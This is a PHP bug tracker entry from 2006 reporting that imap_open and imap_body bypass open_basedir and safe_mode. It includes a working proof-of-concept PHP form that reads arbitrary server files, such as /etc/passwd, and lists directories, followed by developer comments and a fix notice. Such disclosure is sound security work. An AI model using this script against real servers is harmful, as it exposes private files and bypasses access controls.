PHP :: Bug #37265 :: imap_body able to bypass php

Bug #37265

imap_body able to bypass php_openbasedir

Submitted:

2006-05-01 17:02 UTC

Modified:

2006-08-04 20:34 UTC

Votes:	3
Avg. Score:	4.7 ± 0.5
Reproduced:	3 of 3 (100.0%)
Same Version:	2 (66.7%)
Same OS:	2 (66.7%)

From:

Challii at btinternet dot com

Assigned:

iliaa (profile)

Status:

Closed

Package:

IMAP related

PHP Version:

5.1.3, 4.4.2

OS:

RHE3

Private report:

CVE-ID:

None

View Developer Edit

[2006-05-01 17:02 UTC] Challii at btinternet dot com

Description:
------------
Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open
could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.

Reproduce code:
---------------

##### code #####

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>

################

Expected result:
----------------
That the file could not be accessed due to a security permission

Actual result:
--------------
The ability to see any file on the server.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2006-05-01 19:28 UTC] judas dot iscariote at gmail dot com

a PHP dev can correct me if Im wrong, but this is not a PHP bug.

if the mail_open() function of the c-client library allows to read arbitrary files on the server, it's not precisely a PHP problem right ?

php extension can do what the underlying library API permits.

[2006-05-02 18:46 UTC] challii at btinternet dot com

The underlying system has to be able to access different files based on the overlying system configuration and where mailboxes are etc.

The problem lies in the fact that the imap_body doesn't adhere to the php_openbasedir restrictions.

[2006-05-24 22:37 UTC] tony2001@php.net

Assigned to Ilia on his request.

[2006-08-04 20:34 UTC] iliaa@php.net

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Fri Nov 22 05:01:29 2024 UTC